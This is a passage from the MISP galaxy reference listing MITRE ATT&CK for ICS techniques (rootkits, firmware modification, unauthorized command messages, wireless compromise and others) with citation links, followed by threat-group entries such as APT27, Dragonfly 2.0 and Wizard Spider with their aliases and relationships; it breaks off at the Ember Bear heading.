Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. Firmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for I/O that can be attached to the asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable Impact.

The tag is: misp-galaxy:mitre-ics-techniques="Rootkit"

Table 6985. Table References

Links

https://attack.mitre.org/wiki/Technique/T1014

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Screen Capture

Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.

The tag is: misp-galaxy:mitre-ics-techniques="Screen Capture"

Table 6986. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://dragos.com/resource/allanite/

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.symantec.com/security-center/writeup/2017-030708-4403-99

Scripting

Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. In addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.

The tag is: misp-galaxy:mitre-ics-techniques="Scripting"

Table 6987. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://dragos.com/resource/magnallium/

https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms

https://www.bankinfosecurity.com/lyceum-apt-group-new-threat-to-oil-gas-companies-a-13003

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Serial Connection Enumeration

Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate with each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems. While IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.

The tag is: misp-galaxy:mitre-ics-techniques="Serial Connection Enumeration"

Table 6988. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Service Stop

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment. Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction.

The tag is: misp-galaxy:mitre-ics-techniques="Service Stop"

Table 6989. Table References

Links

https://attack.mitre.org/techniques/T1489/

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

Spearphishing Attachment

Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution and access.

The tag is: misp-galaxy:mitre-ics-techniques="Spearphishing Attachment"

Table 6990. Table References

Links

https://attack.mitre.org/techniques/T1193/

https://www.eisac.com/public-news-detail?id=115909

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.wired.com/story/iran-hackers-us-phishing-tensions/

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://dragos.com/wp-content/uploads/Sample-WorldView-Report.pdf

https://dragos.com/wp-content/uploads/yir-ics-activity-groups-threat-landscape-2018.pdf

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://dragos.com/resource/hexane/

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://www.f-secure.com/weblog/archives/00002718.html

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Standard Application Layer Protocol

Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, Telnet, DNP3, and Modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.

The tag is: misp-galaxy:mitre-ics-techniques="Standard Application Layer Protocol"

Table 6991. Table References

Links

https://dragos.com/resource/hexane/

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

Supply Chain Compromise

Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done with the goal of data or system compromise, once infected products are introduced to the target environment. Supply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tool distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third-party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. F-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).

The tag is: misp-galaxy:mitre-ics-techniques="Supply Chain Compromise"

Table 6992. Table References

Links

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf

https://www.f-secure.com/weblog/archives/00002718.html

System Firmware

System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprogramming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. An adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given that firmware is one of the lowest programming abstraction layers. In the 2015 attack on the Ukrainian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries developed malicious firmware for the serial-to-Ethernet devices which rendered them inoperable and severed connections between the control center and the substation.

The tag is: misp-galaxy:mitre-ics-techniques="System Firmware"

Table 6993. Table References

Links

http://www.sciencedirect.com/science/article/pii/S1874548213000231

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Theft of Operational Information

Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data.

The tag is: misp-galaxy:mitre-ics-techniques="Theft of Operational Information"

Table 6994. Table References

Links

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

https://www.symantec.com/security-center/writeup/2012-052811-0308-99

Unauthorized Command Message

Adversaries may send unauthorized command messages to instruct control systems devices to perform actions outside their expected functionality for process control. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device’s actions. An adversary could potentially instruct a control systems device to perform an action that will cause an Impact. In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. In the 2015 attack on the Ukrainian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries used valid credentials to seize control of operator workstations and access a distribution management system (DMS) client application via a VPN. The adversaries used these tools to issue unauthorized commands to breakers at substations, which caused a loss of power to over 225,000 customers over various areas.

The tag is: misp-galaxy:mitre-ics-techniques="Unauthorized Command Message"

Table 6995. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

User Execution

Adversaries may rely on a targeted organization’s user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or Visual Basic code into files such as Microsoft Word and Excel documents or software installers. Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user, especially in cases of trojanized software.

The tag is: misp-galaxy:mitre-ics-techniques="User Execution"

Table 6996. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://www.f-secure.com/weblog/archives/00002718.html

https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939

https://securelist.com/bad-rabbit-ransomware/82851/

Utilize/Change Operating Mode

Adversaries may place controllers into an alternate mode of operation to enable configuration setting changes for evasive code execution or to inhibit device functionality. Programmable controllers typically have several modes of operation. These modes can be broken down into three main categories: program run, program edit, and program write. Each of these modes puts the device in a state in which certain functions are available. For instance, the program edit mode allows alterations to be made to the user program while the device is still online. By driving a device into an alternate mode of operation, an adversary has the ability to change configuration settings in such a way as to cause an Impact to equipment and/or the industrial process associated with the targeted device. An adversary may also use this alternate mode to execute arbitrary code, which could be used to evade defenses.

The tag is: misp-galaxy:mitre-ics-techniques="Utilize/Change Operating Mode"

Table 6997. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Valid Accounts

Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. Adversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system. In the 2015 attack on the Ukrainian power grid, the adversaries used valid credentials to interact directly with the client application of the distribution management system (DMS) server via a VPN and native remote access services to access employee workstations hosting HMI applications. The adversaries caused outages at three different energy companies, causing loss of power to over 225,000 customers over various areas.

The tag is: misp-galaxy:mitre-ics-techniques="Valid Accounts"

Table 6998. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://dragos.com/resource/allanite/

https://dragos.com/resource/dymalloy/

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

https://dragos.com/resource/chrysene/

https://dragos.com/resource/electrum/

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Wireless Compromise

Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A joint case study on the Maroochy Shire Water Services event examined the attack from a cyber security perspective. The adversary disrupted Maroochy Shire’s radio-controlled sewage system by driving around with stolen radio equipment and issuing commands with it. Boden used a two-way radio to communicate with and set the frequencies of Maroochy Shire’s repeater stations. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. The remote controller device allowed the student to interface with the tram’s network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. The controller then enabled initial access to the network, allowing the capture and replay of tram signals.

The tag is: misp-galaxy:mitre-ics-techniques="Wireless Compromise"

Table 6999. Table References

Links

https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf

https://www.slideshare.net/dgpeters/17-bolshev-1-13

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

Intrusion Set

Name of ATT&CK Group.

Intrusion Set is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Ajax Security Team - G0130

[Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013)

The tag is: misp-galaxy:mitre-intrusion-set="Ajax Security Team - G0130"

Ajax Security Team - G0130 is also known as:

  • Ajax Security Team

  • Operation Woolen-Goldfish

  • AjaxTM

  • Rocket Kitten

  • Flying Kitten

  • Operation Saffron Rose

Table 7000. Table References

Links

https://attack.mitre.org/groups/G0130

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf

https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/

https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/

https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf

The White Company - G0089

[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)

The tag is: misp-galaxy:mitre-intrusion-set="The White Company - G0089"

The White Company - G0089 is also known as:

  • The White Company

Table 7001. Table References

Links

https://attack.mitre.org/groups/G0089

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517

Threat Group-3390 - G0027

[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Threat Group-3390 - G0027"

Threat Group-3390 - G0027 is also known as:

  • Threat Group-3390

  • Earth Smilodon

  • TG-3390

  • Emissary Panda

  • BRONZE UNION

  • APT27

  • Iron Tiger

  • LuckyMouse

Threat Group-3390 - G0027 has relationships with:

  • similar: misp-galaxy:threat-actor="APT27" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"

Table 7002. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://attack.mitre.org/groups/G0027

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://thehackernews.com/2018/06/chinese-watering-hole-attack.html

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://www.secureworks.com/research/bronze-union

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

Threat Group-1314 - G0028

[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim’s remote access infrastructure. (Citation: Dell TG-1314)

The tag is: misp-galaxy:mitre-intrusion-set="Threat Group-1314 - G0028"

Threat Group-1314 - G0028 is also known as:

  • Threat Group-1314

  • TG-1314

Threat Group-1314 - G0028 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 7003. Table References

Links

http://www.secureworks.com/resources/blog/living-off-the-land/

https://attack.mitre.org/groups/G0028

Dragonfly 2.0 - G0074

[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015.(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups.(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY)

The tag is: misp-galaxy:mitre-intrusion-set="Dragonfly 2.0 - G0074"

Dragonfly 2.0 - G0074 is also known as:

  • Dragonfly 2.0

  • IRON LIBERTY

  • DYMALLOY

  • Berserk Bear

Table 7004. Table References

Links

http://fortune.com/2017/09/06/hack-energy-grid-symantec/

https://attack.mitre.org/groups/G0074

https://www.dragos.com/threat/dymalloy/

https://www.secureworks.com/research/mcmd-malware-analysis

https://www.secureworks.com/research/threat-profiles/iron-liberty

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://www.us-cert.gov/ncas/alerts/TA18-074A

Lotus Blossom - G0030

[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Lotus Blossom - G0030"

Lotus Blossom - G0030 is also known as:

  • Lotus Blossom

  • DRAGONFISH

  • Spring Dragon

Lotus Blossom - G0030 has relationships with:

  • similar: misp-galaxy:threat-actor="LOTUS PANDA" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Emissary - S0082" with estimative-language:likelihood-probability="almost-certain"

Table 7005. Table References

Links

https://attack.mitre.org/groups/G0030

https://securelist.com/the-spring-dragon-apt/70726/

https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf

https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html

BRONZE BUTLER - G0060

[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-intrusion-set="BRONZE BUTLER - G0060"

BRONZE BUTLER - G0060 is also known as:

  • BRONZE BUTLER

  • REDBALDKNIGHT

  • Tick

BRONZE BUTLER - G0060 has relationships with:

  • similar: misp-galaxy:threat-actor="Tick" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7006. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

https://attack.mitre.org/groups/G0060

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

Dark Caracal - G0070

[Dark Caracal](https://attack.mitre.org/groups/G0070) is a threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012.(Citation: Lookout Dark Caracal Jan 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Dark Caracal - G0070"

Dark Caracal - G0070 is also known as:

  • Dark Caracal

Table 7007. Table References

Links

https://attack.mitre.org/groups/G0070

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

Cobalt Group - G0080

[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008).(Citation: Europol Cobalt Mar 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Cobalt Group - G0080"

Cobalt Group - G0080 is also known as:

  • Cobalt Group

  • GOLD KINGSWOOD

  • Cobalt Gang

  • Cobalt Spider

Table 7008. Table References

Links

https://attack.mitre.org/groups/G0080

https://blog.morphisec.com/cobalt-gang-2.0

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report

https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/

https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.group-ib.com/blog/cobalt

https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

Deep Panda - G0009

[Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://attack.mitre.org/groups/G0009). (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) [Deep Panda](https://attack.mitre.org/groups/G0009) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine) Some analysts track [Deep Panda](https://attack.mitre.org/groups/G0009) and [APT19](https://attack.mitre.org/groups/G0073) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China’s Espionage Jul 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Deep Panda - G0009"

Deep Panda - G0009 is also known as:

  • Deep Panda

  • Shell Crew

  • WebMasters

  • KungFu Kittens

  • PinkPanther

  • Black Vine

Deep Panda - G0009 has relationships with:

  • similar: misp-galaxy:threat-actor="HURRICANE PANDA" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT19" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7009. Table References

Links

https://attack.mitre.org/groups/G0009

https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf

https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/

https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/

https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

Wizard Spider - G0102

[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Wizard Spider - G0102"

Wizard Spider - G0102 is also known as:

  • Wizard Spider

  • UNC1878

  • TEMP.MixMaster

  • Grim Spider

  • FIN12

  • GOLD BLACKBURN

  • ITG23

  • Periwinkle Tempest

Table 7010. Table References

Links

https://attack.mitre.org/groups/G0102

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

https://us-cert.cisa.gov/ncas/alerts/aa20-302a

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf

https://www.secureworks.com/research/threat-profiles/gold-blackburn

Ember Bear - G1003

